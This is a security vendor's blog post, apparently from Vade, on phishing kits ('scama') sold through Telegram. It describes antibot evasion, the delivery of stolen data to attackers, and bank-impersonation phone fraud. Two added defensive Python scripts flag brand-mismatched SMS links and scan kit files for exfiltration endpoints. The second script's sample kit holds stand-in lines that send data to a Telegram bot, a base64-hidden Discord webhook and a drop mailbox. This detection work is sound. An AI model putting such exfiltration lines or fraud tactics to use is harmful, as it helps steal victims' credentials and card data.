Scama: Uncovering the Dark Marketplace for Phishing Kits
Todd Stansfield with contributions from Vade analysts
November 16, 2023
Earlier this month, Vade experts shared their predictions about the top email threats to dominate headlines in 2024. Among them was the continued rise of phishing-as-a-service (PhaaS), a malicious business model that sells sophisticated phishing kits—also referred to as scama, short for scamming method—to anyone willing to pay.
What is Scama?
Scama is a term used to refer to a phishing kit—a collection of malicious assets packaged and sold to hackers via platforms like Telegram. Phishing kits include everything cybercriminals need to launch a phishing campaign, which can include malicious email templates and web pages that impersonate legitimate brands and services.
Scama are sold in packs and include all the malicious assets hackers need to set up their own PhaaS platform. These packs are most often hosted on relatively well-known web hosting platforms, mainly in the Asia-Pacific (APAC) region. Unlike Europe and other places, some countries in APAC, including China and Indonesia, don’t prioritize the regulation of data protection or international cooperation. These locations offer hackers a favorable climate to conduct their nefarious activities.
Below are examples of scama packs for sale on public Telegram groups. They show that cybercriminals advertise their products and services like any other legitimate business, listing the features and benefits of their malicious offerings. These range from “anti-bot protection,” to “responsive” design, to proof of efficacy, and more.
[Image: French scama for Crit’Air]
[Image: French scama for pension insurance]
[Image: German bank scama]
[Image: Netflix Dubai scama]
Among other assets, scama packs include a scampage (scam page or malicious webpage), mailer, and checker—all of which can be used via the web hosting solution. While scampages are designed to harvest victims’ sensitive information, mailers send phishing emails or SMS messages, and checkers verify that victim phone numbers or email addresses don’t appear on blacklists. These tools facilitate the phishing campaign from start to finish.
In some scama packs, hackers sell “SMS Spamming Slots” or “SMS Spamming Apps.” These tools serve as the mailer, and allow hackers to send large volumes of malicious SMS messages that can generate traffic to their scampages.
[Image: Ad for an SMS spamming tool]
Because web hosting solutions provide webmail, they also allow hackers to set up an SMTP server. This makes them the ideal platform for hackers to use and manage malicious campaigns.
Most common or publicly available scama packs are already obsolete. Hackers continue to innovate and introduce new phishing kits that can evade detection and adapt to any location in the world. Unless you are already immersed in the groups and chats where new kits are announced, the ones that are easy to find online are likely already outdated. This underscores the need for an adaptable email security tool that can protect your users even when the threats are not readily identified.
How do scama attacks work?
Scama attacks begin with an initial contact, where the victim receives a phishing email or SMS message (also known as smishing). If the victim clicks or taps the malicious link included in the message, they get redirected to the scampage included in the scama pack.
Below is an example of an initial contact via a smishing text impersonating Netflix. The message urges the intended victim to update their membership via a malicious link that points to the domain “bedy13.com.”
[Image: Smishing text impersonating Netflix]
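As an added example (not Vade's tooling), the check below flags a message like the one above: it names a brand but links to a host outside that brand's domains, including the case where the brand's domain is used as a deceptive subdomain. The allowlist, the message texts and the URL paths are constructed; only the domain bedy13.com comes from the article.

```python
import re
from urllib.parse import urlsplit

# Assumption: the defender maintains the registrable domains each brand uses.
BRAND_DOMAINS = {"netflix": {"netflix.com"}}

# Links in SMS often omit the scheme, so it is optional here.
URL_RE = re.compile(r"(?:https?://)?(?:[a-z0-9-]+\.)+[a-z]{2,}(?:/\S*)?", re.I)

def host_of(url):
    """Lower-cased hostname of a URL, with or without a scheme."""
    if "://" not in url:
        url = "http://" + url
    return (urlsplit(url).hostname or "").lower().rstrip(".")

def belongs_to(host, domain):
    """True only for the domain itself or a real subdomain of it."""
    return host == domain or host.endswith("." + domain)

def triage_sms(text):
    """Return (brand, host) pairs where a named brand links off-domain."""
    lowered = text.lower()
    brands = [b for b in BRAND_DOMAINS if b in lowered]
    findings = []
    for match in URL_RE.finditer(text):
        host = host_of(match.group(0))
        for brand in brands:
            if not any(belongs_to(host, d) for d in BRAND_DOMAINS[brand]):
                findings.append((brand, host))
    return findings

# Constructed messages; only the domain bedy13.com comes from the article.
SMISHING = "Netflix: your membership is on hold. Update it at https://bedy13.com/login"
LOOKALIKE = "NETFLIX alert, confirm your card: netflix.com.bedy13.com/update"
GENUINE = "Netflix: new sign-in detected. Review it at https://www.netflix.com/account"

if __name__ == "__main__":
    for sms in (SMISHING, LOOKALIKE, GENUINE):
        print(triage_sms(sms) or "no mismatch", "<-", sms)
```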
For malicious campaigns such as these to be successful, the scampage must possess an antibot mechanism, a feature critically important to scammers.
In phishing kits, antibot mechanisms are designed to mimic human behavior and evade automated bot detection systems. They introduce random delays, mimic different user agents, simulate mouse movements, and click phishing pages. This makes it harder for security systems to differentiate between legitimate users and attackers, allowing the phishing attacks to proceed undetected.
Scampages also contain malicious fields to harvest the victim’s private information, such as their name, address, credit card number, or account credentials.
Once a victim enters information into the phishing page, it gets automatically transmitted to the attacker, who can retrieve it through a bot on Telegram, Discord or even an automated email service.
[Image: An example of a transmitted announcement from a Telegram group]
After hackers gain access to the victim’s information, they can engage in a variety of nefarious activities, such as selling it on forums or Telegram groups. They can also carry out subsequent scams that are relatively new.
A recent scamming scheme involves calling a victim and impersonating an anti-fraud agent who represents a bank. The caller, following a script, alerts the victim that the bank has detected suspicious transactions on their account due to phishing. The fake anti-fraud agent asks the victim to verify sensitive information and claims to cancel the malicious transaction. Meanwhile, the caller often adds the victim’s credit card to an Apple Pay wallet or uses it to make online purchases.
Some scama packs offer this phone service, where an individual specialized in the scam makes the call for the hacker.
If the phone scam fails, hackers can easily use the credit card on websites that don’t require verification for transactions below a certain amount—often €500.
Scammers employ various techniques to conceal their phone numbers during scams, including Caller ID spoofing, VoIP services, anonymous SIM cards, and virtual numbers. They often use prerecorded calls and utilize international relay networks to obfuscate their location.
The nefarious relationship between scama buyers and sellers
While scama producers are incentivized to serve malicious customers, they’re also motivated to scam them. Scama sellers often attempt to exploit customers by embedding malicious code in their packs. Because of this common practice, tools like RezStealerFinder have emerged to protect hackers and enable them to secure their phishing pages.
RezStealerFinder detects malicious content in webpages, scanning for vulnerable, sometimes obfuscated code and unknown links that may be present in scama packs. The tool is effective at finding hidden code that a devious scama seller might use.
User-friendly and designed for hackers of various skill levels, RezStealerFinder is available for purchase on Telegram groups, as shown in the example below.
[Image: RezStealerFinder app for sale on Telegram]
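An analyst triaging a recovered kit can run the same kind of inspection to find where stolen data is sent, including endpoints a seller has hidden. The sketch below is an added example, not RezStealerFinder or Vade code: it looks for the Telegram, Discord and e-mail channels described earlier, both in plain source and inside base64 string literals. File names, IDs and tokens are constructed, and matching PHP mail() calls is an assumption about how the e-mail channel appears in a kit.

```python
import base64
import binascii
import re

# Exfiltration channels named in the article, as they would appear in kit source.
CHANNELS = {
    "telegram": re.compile(r"api\.telegram\.org/bot(\d+):[\w-]+", re.I),
    "discord": re.compile(r"discord(?:app)?\.com/api/webhooks/(\d+)/[\w-]+", re.I),
    "email": re.compile(r"\bmail\s*\(\s*['\"]([^'\"\s]+@[^'\"\s]+)['\"]", re.I),
}
# Quoted string literals long enough to be worth trying as base64.
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{24,}={0,2})['\"]")

def decoded_layers(text):
    """Yield text hidden in base64 string literals (one level deep)."""
    for match in B64_LITERAL.finditer(text):
        try:
            raw = base64.b64decode(match.group(1), validate=True)
            yield raw.decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue

def scan_kit(files):
    """Return sorted (path, channel, identifier, hidden) findings.

    identifier is the bot ID, webhook ID or mailbox; secrets are not kept.
    """
    findings = set()
    for path, text in files.items():
        layers = [(text, False)] + [(d, True) for d in decoded_layers(text)]
        for layer, hidden in layers:
            for channel, pattern in CHANNELS.items():
                for match in pattern.finditer(layer):
                    findings.add((path, channel, match.group(1), hidden))
    return sorted(findings)

# Constructed sample: fragments shaped like kit files, not a real kit.
_HIDDEN = base64.b64encode(
    b"https://discord.com/api/webhooks/222222222222/constructed-token").decode()
SAMPLE_KIT = {
    "send.php": '$u = "https://api.telegram.org/bot1111111111:constructed_token/sendMessage";',
    "lib/antibot.php": f'$k = base64_decode("{_HIDDEN}");',
    "result.php": "mail('drop@example.invalid', $subject, $body);",
}

if __name__ == "__main__":
    for finding in scan_kit(SAMPLE_KIT):
        print(finding)
```

A finding with hidden set to True marks an endpoint that only appears after decoding, which is the case worth reporting first.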
Scama: A thriving menace
While scama isn’t a new threat, its market continues to flourish. For a simple fee, anyone can use a scama pack and become a hacker capable of deploying a sophisticated attack. Scama has not only expanded the threat landscape by lowering the barriers to entry, but it has also made existing hackers more productive than before.
Scama is a key reason phishing volumes have reached historic levels. In the first three quarters of 2023, Vade has detected more phishing emails than any annual total on record.
[Image: Phishing volumes detected by Vade from 2019 to Q3 2023]
To stay protected against scama threats, Vade encourages organizations to upgrade their email security and adopt phishing awareness training.